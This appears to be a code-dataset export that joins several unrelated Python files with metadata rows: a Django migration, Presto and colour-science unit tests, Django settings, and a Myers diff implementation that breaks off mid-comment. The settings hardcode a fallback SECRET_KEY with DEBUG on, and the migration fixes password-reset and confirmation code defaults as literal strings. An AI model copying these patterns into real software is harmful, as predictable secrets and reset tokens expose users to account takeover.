| mit | -7,664,057,494,624,798,000 | 25.929825 | 61 | 0.631922 | false |
Alaxe/judgeSystem | users/migrations/0003_auto_20150628_1423.py | 1 | 1618 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20150628_1254'),
]
operations = [
migrations.RemoveField(
model_name='userproblemdata',
name='problem',
),
migrations.RemoveField(
model_name='userproblemdata',
name='user',
),
migrations.RemoveField(
model_name='userstatts',
name='user',
),
migrations.AlterField(
model_name='confirmation',
name='code',
field=models.CharField(max_length=32, default='1S5YH6W2QZM6M2CAON7SRYVOHW3QGJ6L'),
),
migrations.AlterField(
model_name='confirmation',
name='created',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 28, 11, 23, 5, 785908, tzinfo=utc)),
),
migrations.AlterField(
model_name='passreset',
name='code',
field=models.CharField(max_length=32, default='5OXTRMZ5U464J91IFWXJFTODJSWGI8YW'),
),
migrations.AlterField(
model_name='passreset',
name='created',
field=models.DateTimeField(default=datetime.datetime(2015, 6, 28, 11, 23, 5, 786551, tzinfo=utc)),
),
migrations.DeleteModel(
name='UserProblemData',
),
migrations.DeleteModel(
name='UserStatts',
),
]
| gpl-2.0 | -1,409,407,466,053,704,200 | 28.962963 | 110 | 0.566749 | false |
prestodb/presto-admin | tests/unit/test_topology.py | 1 | 4727 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests the presto topology config
"""
import unittest
from mock import patch
from fabric.state import env
from prestoadmin import topology
from prestoadmin.standalone import config
from prestoadmin.standalone.config import StandaloneConfig
from prestoadmin.util.exception import ConfigurationError
from tests.unit.base_unit_case import BaseUnitCase
class TestTopologyConfig(BaseUnitCase):
def setUp(self):
super(TestTopologyConfig, self).setUp(capture_output=True)
@patch('tests.unit.test_topology.StandaloneConfig._get_conf_from_file')
def test_fill_conf(self, get_conf_from_file_mock):
get_conf_from_file_mock.return_value = \
{"username": "john", "port": "100"}
config = StandaloneConfig()
conf = config.read_conf()
self.assertEqual(conf, {"username": "john", "port": 100,
"coordinator": "localhost",
"workers": ["localhost"]})
def test_invalid_property(self):
conf = {"username": "me",
"port": "1234",
"coordinator": "coordinator",
"workers": ["node1", "node2"],
"invalid property": "fake"}
self.assertRaisesRegexp(ConfigurationError,
"Invalid property: invalid property",
config.validate, conf)
def test_basic_valid_conf(self):
conf = {"username": "user",
"port": 1234,
"coordinator": "my.coordinator",
"workers": ["my.worker1", "my.worker2", "my.worker3"]}
self.assertEqual(config.validate(conf.copy()), conf)
def test_valid_string_port_to_int(self):
conf = {'username': 'john',
'port': '123',
'coordinator': 'master',
'workers': ['worker1', 'worker2']}
validated_conf = config.validate(conf.copy())
self.assertEqual(validated_conf['port'], 123)
def test_empty_host(self):
self.assertRaisesRegexp(ConfigurationError,
"'' is not a valid ip address or host name",
config.validate_coordinator, (""))
def test_valid_workers(self):
workers = ["172.16.1.10", "myslave", "FE80::0202:B3FF:FE1E:8329"]
self.assertEqual(config.validate_workers(workers), workers)
def test_no_workers(self):
self.assertRaisesRegexp(ConfigurationError,
"Must specify at least one worker",
config.validate_workers, ([]))
def test_invalid_workers_type(self):
self.assertRaisesRegexp(ConfigurationError,
"Workers must be of type list. "
"Found <type 'str'>",
config.validate_workers, ("not a list"))
def test_invalid_coordinator_type(self):
self.assertRaisesRegexp(ConfigurationError,
"Host must be of type string. "
"Found <type 'list'>",
config.validate_coordinator,
(["my", "list"]))
def test_validate_workers_for_prompt(self):
workers_input = "172.16.1.10 myslave FE80::0202:B3FF:FE1E:8329"
workers_list = ["172.16.1.10", "myslave", "FE80::0202:B3FF:FE1E:8329"]
self.assertEqual(config.validate_workers_for_prompt(workers_input),
workers_list)
def test_show(self):
env.roledefs = {'coordinator': ['hello'], 'worker': ['a', 'b'],
'all': ['a', 'b', 'hello']}
env.user = 'user'
env.port = '22'
self.remove_runs_once_flag(topology.show)
topology.show()
self.assertEqual("", self.test_stderr.getvalue())
self.assertEqual("{'coordinator': 'hello',\n 'port': '22',\n "
"'username': 'user',\n 'workers': ['a',\n"
" 'b']}\n",
self.test_stdout.getvalue())
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -4,119,446,143,831,137,300 | 38.391667 | 78 | 0.562513 | false |
bcoding/django-docker-hostmanager | docker_hostmanager/settings.py | 1 | 2000 | import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = os.environ.get('SECRET_KEY', 'sj0q9n1_h=b8my#6-n^r=l5=hgekx4gwrl1nmaoox^-_%6=%qj')
DEBUG = True
if not DEBUG and 'SECRET_KEY' not in os.environ:
    raise Exception('production environments must have its own SECRET_KEY')
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'docker_hostmanager.api',
'docker_hostmanager.rest',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'docker_hostmanager.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'docker_hostmanager.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'hostmanager.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = '.'
| unlicense | 7,148,998,048,566,972,000 | 25.315789 | 95 | 0.6675 | false |
colour-science/colour | colour/models/rgb/transfer_functions/tests/test_st_2084.py | 1 | 5051 | # -*- coding: utf-8 -*-
"""
Defines the unit tests for the
:mod:`colour.models.rgb.transfer_functions.st_2084` module.
"""
import numpy as np
import unittest
from colour.models.rgb.transfer_functions import (eotf_inverse_ST2084,
eotf_ST2084)
from colour.utilities import domain_range_scale, ignore_numpy_errors
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = ['TestEotf_inverse_ST2084', 'TestEotf_ST2084']
class TestEotf_inverse_ST2084(unittest.TestCase):
"""
Defines :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition unit tests methods.
"""
def test_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition.
"""
self.assertAlmostEqual(
eotf_inverse_ST2084(0.0), 0.000000730955903, places=7)
self.assertAlmostEqual(
eotf_inverse_ST2084(100), 0.508078421517399, places=7)
self.assertAlmostEqual(
eotf_inverse_ST2084(400), 0.652578597563067, places=7)
self.assertAlmostEqual(eotf_inverse_ST2084(5000, 5000), 1.0, places=7)
def test_n_dimensional_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition n-dimensional arrays support.
"""
C = 100
N = eotf_inverse_ST2084(C)
C = np.tile(C, 6)
N = np.tile(N, 6)
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
C = np.reshape(C, (2, 3))
N = np.reshape(N, (2, 3))
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
C = np.reshape(C, (2, 3, 1))
N = np.reshape(N, (2, 3, 1))
np.testing.assert_almost_equal(eotf_inverse_ST2084(C), N, decimal=7)
def test_domain_range_scale_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition domain and range scale support.
"""
C = 100
N = eotf_inverse_ST2084(C)
d_r = (('reference', 1), (1, 1), (100, 100))
for scale, factor in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
eotf_inverse_ST2084(C * factor), N * factor, decimal=7)
@ignore_numpy_errors
def test_nan_eotf_inverse_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_inverse_ST2084` definition nan support.
"""
eotf_inverse_ST2084(
np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]))
class TestEotf_ST2084(unittest.TestCase):
"""
Defines :func:`colour.models.rgb.transfer_functions.st_2084.eotf_ST2084`
definition unit tests methods.
"""
def test_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition.
"""
self.assertAlmostEqual(eotf_ST2084(0.0), 0.0, places=7)
self.assertAlmostEqual(eotf_ST2084(0.508078421517399), 100, places=7)
self.assertAlmostEqual(eotf_ST2084(0.652578597563067), 400, places=7)
self.assertAlmostEqual(eotf_ST2084(1.0, 5000), 5000.0, places=7)
def test_n_dimensional_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition n-dimensional arrays support.
"""
N = 0.508078421517399
C = eotf_ST2084(N)
N = np.tile(N, 6)
C = np.tile(C, 6)
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
N = np.reshape(N, (2, 3))
C = np.reshape(C, (2, 3))
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
N = np.reshape(N, (2, 3, 1))
C = np.reshape(C, (2, 3, 1))
np.testing.assert_almost_equal(eotf_ST2084(N), C, decimal=7)
def test_domain_range_scale_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition domain and range scale support.
"""
N = 0.508078421517399
C = eotf_ST2084(N)
d_r = (('reference', 1), (1, 1), (100, 100))
for scale, factor in d_r:
with domain_range_scale(scale):
np.testing.assert_almost_equal(
eotf_ST2084(N * factor), C * factor, decimal=7)
@ignore_numpy_errors
def test_nan_eotf_ST2084(self):
"""
Tests :func:`colour.models.rgb.transfer_functions.st_2084.\
eotf_ST2084` definition nan support.
"""
eotf_ST2084(np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 8,866,690,478,021,569,000 | 30.372671 | 78 | 0.605425 | false |
RobertElderSoftware/roberteldersoftwarediff | myers_diff_and_variations.py | 1 | 43442 | # Copyright 2017 Robert Elder Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import string
import sys
import os
"""
This file contains Python implementations for variations of algorithms described in
'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS. A few optimizations
not mentioned in the paper are also included here.
* FUNCTIONS INCLUDED IN THIS FILE *
- diff(list1, list2) - A function to determine the minimal difference between two sequences that
is super easy to just copy and paste when you don't actually care about all the other stuff
in this document, and you just need to get back to work because it's already 7pm and you're still
at the office, and you just want to get this stupid thing to work, why is there no easy answer on
Stack Overflow that I can just copy and paste? Oh man, I really need to stop doing this and
start saying no to these crazy deadlines. I have so many friends that I need to get back to and haven't
spoken to in a while... Maybe I'll just stay until most of my stock options vest, and then I'll
quit. This function has worst-case execution time of O(min(len(a),len(b)) * D), and requires
2 * (2 * min(len(a),len(b))) space.
- apply_edit_script(edit_script, s1, s2) - An example function that shows how you could make use of
the edit script returned by 'diff' or 'shortest_edit_script' by re-constructing s2 from s1 and the
edit script.
- shortest_edit_script(old_sequence, new_sequence) - A well-formatted version of the diff function
(mentioned above) that optimizes for code clarity and readability. This version also calls out
to the find_middle_snake function which it depends on. This version of the algorithm is also
presented in a way that attempts to match the description from the paper.
- longest_common_subsequence(list1, list2) - A function that returns a list that is the longest
common sub-sequence of the two input sequences.
- find_middle_snake_less_memory(old_sequence, N, new_sequence, M) - A variant of the 'find middle
    snake' algorithm that has more restricted bounds so the calculation doesn't go off the end of the
edit grid. It has worst-case execution time of min(len(a),len(b)) * D, and requires
2 * (2 * min(len(a),len(b))) space.
- find_middle_snake_myers_original(old_sequence, N, new_sequence, M) - A concrete implementation of
the algorithm discussed in Myers' paper. This algorithm has worst-case execution time of (M + N) * D
and requires 2 * (M + N) space.
- myers_diff_length_minab_memory(old_sequence, new_sequence) - A version of the basic length measuring
    algorithm that makes use of the restricted bounds, and also allocates less memory by treating the V
array as a circular buffer.
- myers_diff_length_original_page_6(old_sequence, new_sequence) - A concrete implementation of the algorithm
discussed on page 6 of Myers' paper.
- myers_diff_length_optimize_y_variant(old_sequence, new_sequence) - A variant of the basic length measuring
algorithm that optimized for the y variable instead of x. It is helpful to study this version when
attempting to understand the algorithm since the choice of optimizing x or y is rather arbitrary.
- Various other functions are included for testing.
"""
# Returns a minimal list of differences between 2 lists e and f
# requring O(min(len(e),len(f))) space and O(min(len(e),len(f)) * D)
# worst-case execution time where D is the number of differences.
def diff(e, f, i=0, j=0):
# Documented at http://blog.robertelder.org/diff-algorithm/
N,M,L,Z = len(e),len(f),len(e)+len(f),2*min(len(e),len(f))+2
if N > 0 and M > 0:
w,g,p = N-M,[0]*Z,[0]*Z
for h in range(0, (L//2+(L%2!=0))+1):
for r in range(0, 2):
c,d,o,m = (g,p,1,1) if r==0 else (p,g,0,-1)
for k in range(-(h-2*max(0,h-M)), h-2*max(0,h-N)+1, 2):
a = c[(k+1)%Z] if (k==-h or k!=h and c[(k-1)%Z]<c[(k+1)%Z]) else c[(k-1)%Z]+1
b = a-k
s,t = a,b
while a<N and b<M and e[(1-o)*N+m*a+(o-1)]==f[(1-o)*M+m*b+(o-1)]:
a,b = a+1,b+1
c[k%Z],z=a,-(k-w)
if L%2==o and z>=-(h-o) and z<=h-o and c[k%Z]+d[z%Z] >= N:
D,x,y,u,v = (2*h-1,s,t,a,b) if o==1 else (2*h,N-a,M-b,N-s,M-t)
if D > 1 or (x != u and y != v):
return diff(e[0:x],f[0:y],i,j)+diff(e[u:N],f[v:M],i+u,j+v)
elif M > N:
return diff([],f[N:M],i+N,j+N)
elif M < N:
return diff(e[M:N],[],i+M,j+M)
else:
return []
elif N > 0: # Modify the return statements below if you want a different edit script format
return [{"operation": "delete", "position_old": i+n} for n in range(0,N)]
else:
return [{"operation": "insert", "position_old": i,"position_new":j+n} for n in range(0,M)]
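# Added usage sketch (not part of the original file): shows the edit script
# format on two tiny sequences chosen for illustration.
def _diff_usage_sketch():
    script = diff(list('abc'), list('acd'))
    # expected: a delete of 'b' at old position 1 and an insert of 'd'
    # (new position 2) before old position 3, i.e. roughly
    # [{'operation': 'delete', 'position_old': 1},
    #  {'operation': 'insert', 'position_old': 3, 'position_new': 2}]
    return script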
def find_middle_snake_less_memory(old_sequence, N, new_sequence, M):
"""
A variant of the 'find middle snake' function that uses O(min(len(a), len(b)))
memory instead of O(len(a) + len(b)) memory. This does not improve the
worst-case memory requirement, but it takes the best case memory requirement
down to near zero.
"""
MAX = N + M
Delta = N - M
V_SIZE=2*min(M,N) + 2
Vf = [None] * V_SIZE
Vb = [None] * V_SIZE
Vf[1] = 0
Vb[1] = 0
for D in range(0, (MAX//2+(MAX%2!=0)) + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and Vf[(k - 1) % V_SIZE] < Vf[(k + 1) % V_SIZE]:
x = Vf[(k + 1) % V_SIZE]
else:
x = Vf[(k - 1) % V_SIZE] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
Vf[k % V_SIZE] = x
inverse_k = (-(k - Delta))
if (Delta % 2 == 1) and inverse_k >= -(D -1) and inverse_k <= (D -1):
if Vf[k % V_SIZE] + Vb[inverse_k % V_SIZE] >= N:
return 2 * D -1, x_i, y_i, x, y
for k in range(-(D - 2*max(0, D-M)), (D - 2*max(0, D-N)) + 1, 2):
if k == -D or k != D and Vb[(k - 1) % V_SIZE] < Vb[(k + 1) % V_SIZE]:
x = Vb[(k + 1) % V_SIZE]
else:
x = Vb[(k - 1) % V_SIZE] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[N - x -1] == new_sequence[M - y - 1]:
x = x + 1
y = y + 1
Vb[k % V_SIZE] = x
inverse_k = (-(k - Delta))
if (Delta % 2 == 0) and inverse_k >= -D and inverse_k <= D:
if Vb[k % V_SIZE] + Vf[inverse_k % V_SIZE] >= N:
return 2 * D, N - x, M - y, N - x_i, M - y_i
def find_middle_snake_myers_original(old_sequence, N, new_sequence, M):
"""
This function is a concrete implementation of the algorithm for 'finding the middle snake' presented
similarly to the pseudocode on page 11 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This algorithm is a centeral part of calculating either the smallest edit script for a pair of
sequences, or finding the longest common sub-sequence (these are known to be dual problems).
The worst-case (and expected case) space requirement of this function is O(N + M), where N is
the length of the first sequence, and M is the length of the second sequence.
The worst-case run time of this function is O(MN) and this occurs when both string have no common
sub-sequence. Since the expected case is for the sequences to have some similarities, the expected
run time is O((M + N)D) where D is the number of edits required to transform sequence A into sequence B.
The space requirement remains the same in all cases, but less space could be used with a modified version
of the algorithm that simply specified a user-defined MAX value less than M + N. In this case, the
algorithm would stop earlier and report a D value no greater than MAX, which would be interpreted as
'there is no edit sequence less than length D that produces the new_sequence from old_sequence'.
Note that (if I have understood the paper correctly), the k values used for the reverse direction
of this implementation have opposite sign compared with those suggested in the paper. I found this made
the algorithm easier to implement as it makes the forward and reverse directions more symmetric.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
There are 5 return values for this function:
The first is an integer representing the number of edits (delete or insert) that are necessary to
produce new_sequence from old_sequence.
The next two parts of the return value are the point (x, y) representing the starting coordinate of the
middle snake.
The next two return values are the point (u, v) representing the end coordinate of the middle snake.
It is possible that (x,y) == (u,v)
"""
# The sum of the length of the seqeunces.
MAX = N + M
# The difference between the length of the sequences.
Delta = N - M
# The array that holds the 'best possible x values' in search from top left to bottom right.
Vf = [None] * (MAX + 2)
# The array that holds the 'best possible x values' in search from bottom right to top left.
Vb = [None] * (MAX + 2)
# The initial point at (0, -1)
Vf[1] = 0
# The initial point at (N, M+1)
Vb[1] = 0
# We only need to iterate to ceil((max edit length)/2) because we're searching in both directions.
for D in range(0, (MAX//2+(MAX%2!=0)) + 1):
for k in range(-D, D + 1, 2):
if k == -D or k != D and Vf[k - 1] < Vf[k + 1]:
# Did not increase x, but we'll take the better (or only) x value from the k line above
x = Vf[k + 1]
else:
# We can increase x by building on the best path from the k line above
x = Vf[k - 1] + 1
# From fundamental axiom of this algorithm: x - y = k
y = x - k
# Remember the initial point before the snake so we can report it.
x_i = x
y_i = y
# While these sequences are identical, keep moving through the graph with no cost
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
# This is the new best x value
Vf[k] = x
# Only check for connections from the forward search when N - M is odd
# and when there is a reciprocal k line coming from the other direction.
if (Delta % 2 == 1) and (-(k - Delta)) >= -(D -1) and (-(k - Delta)) <= (D -1):
if Vf[k] + Vb[-(k - Delta)] >= N:
return 2 * D -1, x_i, y_i, x, y
for k in range(-D, D + 1, 2):
if k == -D or k != D and Vb[k - 1] < Vb[k + 1]:
x = Vb[k + 1]
else:
x = Vb[k - 1] + 1
y = x - k
x_i = x
y_i = y
while x < N and y < M and old_sequence[N - x -1] == new_sequence[M - y - 1]:
x = x + 1
y = y + 1
Vb[k] = x
if (Delta % 2 == 0) and (-(k - Delta)) >= -D and (-(k - Delta)) <= D:
if Vb[k] + Vf[(-(k - Delta))] >= N:
return 2 * D, N - x, M - y, N - x_i, M - y_i
def longest_common_subsequence_h(old_sequence, N, new_sequence, M):
"""
This function is a concrete implementation of the algorithm for finding the longest common subsequence presented
similarly to the pseudocode on page 12 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
The return value is a new sequence that is the longest common subsequence of old_sequence and new_sequence.
"""
rtn = []
if N > 0 and M > 0:
D, x, y, u, v = find_middle_snake_less_memory(old_sequence, N, new_sequence, M)
if D > 1:
# LCS(A[1..x],x,B[1..y],y)
rtn.extend(longest_common_subsequence_h(old_sequence[0:x], x, new_sequence[0:y], y))
# Output A[x+1..u].
rtn.extend(old_sequence[x:u])
# LCS(A[u+1..N],N-u,B[v+1..M],M-v)
rtn.extend(longest_common_subsequence_h(old_sequence[u:N], N-u, new_sequence[(v):M], M-v))
elif M > N:
# Output A[1..N].
rtn.extend(old_sequence[0:N])
else:
# Output B[1..M].
rtn.extend(new_sequence[0:M])
return rtn
def longest_common_subsequence(old_sequence, new_sequence):
# Just a helper function so you don't have to pass in the length of the sequences.
    return longest_common_subsequence_h(old_sequence, len(old_sequence), new_sequence, len(new_sequence))
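# Added usage sketch (not part of the original file): the classic string pair
# below has a unique longest common subsequence of length 4.
def _longest_common_subsequence_usage_sketch():
    # expected result: ['M', 'J', 'A', 'U']
    return longest_common_subsequence(list('XMJYAUZ'), list('MZJAWXU'))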
def shortest_edit_script_h(old_sequence, N, new_sequence, M, current_x, current_y):
"""
This function is a concrete implementation of the algorithm for finding the shortest edit script that was
'left as an exercise' on page 12 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@N The length of 'old_sequence'
@new_sequence The new sequence to compare 'old_sequence' against.
@M The length of 'new_sequence'
    The return value is a sequence of objects that contains the indices in old_sequence and new_sequence that
you could use to produce new_sequence from old_sequence using the minimum number of edits.
The format of this function as it is currently written is optimized for clarity, not efficiency. It is
expected that anyone wanting to use this function in a real application would modify the 2 lines noted
below to produce whatever representation of the edit sequence you wanted.
"""
rtn = []
if N > 0 and M > 0:
D, x, y, u, v = find_middle_snake_less_memory(old_sequence, N, new_sequence, M)
# If the graph represented by the current sequences can be further subdivided.
if D > 1 or (x != u and y != v):
# Collection delete/inserts before the snake
rtn.extend(shortest_edit_script_h(old_sequence[0:x], x, new_sequence[0:y], y, current_x, current_y))
# Collection delete/inserts after the snake
rtn.extend(shortest_edit_script_h(old_sequence[u:N], N-u, new_sequence[v:M], M-v, current_x + u, current_y + v))
elif M > N:
# M is longer than N, but we know there is a maximum of one edit to transform old_sequence into new_sequence
# The first N elements of both sequences in this case will represent the snake, and the last element
# will represent a single insertion.
rtn.extend(shortest_edit_script_h(old_sequence[N:N], N-N, new_sequence[N:M], M-N, current_x + N, current_y + N))
elif M < N:
# N is longer than (or equal to) M, but we know there is a maximum of one edit to transform old_sequence into new_sequence
# The first M elements of both sequences in this case will represent the snake, and the last element
# will represent a single deletion. If M == N, then this reduces to a snake which does not contain any edits.
rtn.extend(shortest_edit_script_h(old_sequence[M:N], N-M, new_sequence[M:M], M-M, current_x + M, current_y + M))
elif N > 0:
# This area of the graph consist of only horizontal edges that represent deletions.
for i in range(0, N):
# Modify this line if you want a more efficient representation:
rtn.append({"operation": "delete", "position_old": current_x + i})
else:
# This area of the graph consist of only vertical edges that represent insertions.
for i in range(0, M):
# Modify this line if you want a more efficient representation:
rtn.append({"operation": "insert", "position_old": current_x, "position_new": current_y + i})
return rtn
def shortest_edit_script(old_sequence, new_sequence):
# Just a helper function so you don't have to pass in the length of the sequences.
    return shortest_edit_script_h(old_sequence, len(old_sequence), new_sequence, len(new_sequence), 0, 0)
def get_random_edit_script(old_sequence, new_sequence):
"""
Used for testing. The Myers algorithms should never produce an edit script
that is longer than the random version.
"""
es = []
N = len(old_sequence)
M = len(new_sequence)
x = 0
y = 0
D = 0
while not (x == N and y == M):
while (x < N) and (y < M) and (old_sequence[x] == new_sequence[y]):
x = x + 1
y = y + 1
if (x < N) and (y < M):
if random.randint(0, 1):
es.append({"operation": "delete", "position_old": x})
x = x + 1
else:
es.append({"operation": "insert", "position_old": x, "position_new": y})
y = y + 1
D = D + 1
elif x < N:
es.append({"operation": "delete", "position_old": x})
x = x + 1
D = D + 1
elif y < M:
es.append({"operation": "insert", "position_old": x, "position_new": y})
y = y + 1
D = D + 1
return es
def myers_diff_length_minab_memory(old_sequence, new_sequence):
"""
A variant that uses min(len(a),len(b)) memory
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V_SIZE = 2*min(N,M) + 2
V = [None] * V_SIZE
V[1] = 0
for D in range(0, MAX + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and V[(k - 1) % V_SIZE] < V[(k + 1) % V_SIZE]:
x = V[(k + 1) % V_SIZE]
else:
x = V[(k - 1) % V_SIZE] + 1
y = x - k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k % V_SIZE] = x
if x == N and y == M:
return D
def myers_diff_length_half_memory(old_sequence, new_sequence):
"""
This function is a modified implementation of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
This version uses 50% of the memory of the one described of page 6 of the paper, and has 50% of the
worst-case execution time.
The optimization comes from improving the calculation of the iteration bounds and replacing the line:
for k in range(-D, D + 1, 2):
from the original with
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
This optimization works by maintaining tighter bounds on k by measuring how far off the edit grid
    the current value of D would take us if we were to look at points on the line k = D. The overshoot
distance is equal to D-N on the right edge of the edit grid, and D-M on the bottom edge of the edit
grid.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
V = [None] * (MAX + 2)
V[1] = 0
for D in range(0, MAX + 1):
for k in range(-(D - 2*max(0, D-M)), D - 2*max(0, D-N) + 1, 2):
if k == -D or k != D and V[k - 1] < V[k + 1]:
x = V[k + 1]
else:
x = V[k - 1] + 1
y = x - k
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
V[k] = x
if x == N and y == M:
return D
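# Added illustration (not part of the original file): computes the tightened
# k bounds used by the loop above for a hypothetical N, M and D. For N=2,
# M=5, D=4 the original loop would scan k in [-4, 4] while the bounded loop
# only scans k in [-4, 0], because any k > 0 would walk off the right edge of
# the edit grid.
def _tightened_k_bounds_sketch(N=2, M=5, D=4):
    low = -(D - 2 * max(0, D - M))
    high = D - 2 * max(0, D - N)
    return low, high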
def myers_diff_length_original_page_6(old_sequence, new_sequence):
"""
This function is a concrete implementation of the algorithm for finding the length of the shortest edit
script on page 6 of 'An O(ND) Difference Algorithm and Its Variations' by EUGENE W. MYERS.
@old_sequence This represents a sequence of something that can be compared against 'new_sequence'
using the '==' operator. It could be characters, or lines of text or something different.
@new_sequence The new sequence to compare 'old_sequence' against.
The return value is an integer describing the minimum number of edits required to produce new_sequence
from old_sequence. If no edits are required the return value is 0. Since this function only returns
the length of the shortest edit sequence, you must use another function (included here) to recover
the edit sequence. You can also modify this version to do it, but this requires O((M+N)^2) memory.
The format of this function as it is currently written is optimized for clarity and to match
the version found in the referenced paper. There are a few optimizations that can be done to
decrease the memory requirements, and those have been done in another function here.
"""
N = len(old_sequence)
M = len(new_sequence)
MAX = N + M
# The +2 ensures we don't get an access violation when N + M = 0, since we need to
# consider at least 2 points for a comparison of empty sequences.
# The 2*MAX can be reduced to just MAX using more intelligent bounds calculation
# instead of just iterating from -D to D.
V = [None] * (2 * MAX + 2)
V[1] = 0
for D in range(0, MAX + 1):
# The range -D to D expands as we move diagonally accross the rectangular edit grid.
for k in range(-D, D + 1, 2):
            # If k is against the left wall, or (not against the top wall and there is a
# k line that has reached a higher x value above the current k line)
if k == -D or k != D and V[k - 1] < V[k + 1]:
# Extend the path from the k line above to add an insertion to the path.
# V[] measures the best x values, so we don't need to increment x here.
x = V[k + 1]
else:
                # Otherwise, V[k - 1] >= V[k + 1], or k == D, which means that we
# use the k line from below to extend the best path, and since this
# path is a horizontal one (a deletion), we increment x.
x = V[k - 1] + 1
# From the axiom of the algorithm: x - y = k
y = x - k
# Move through the diagonal that has 0 edit cost (strings are same here)
while x < N and y < M and old_sequence[x] == new_sequence[y]:
x = x + 1
y = y + 1
# Store our new best x value
V[k] = x
# Have we completely moved through the grid?
if x >= N and y >= M:
return D
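# Added usage sketch (not part of the original file): the example pair from
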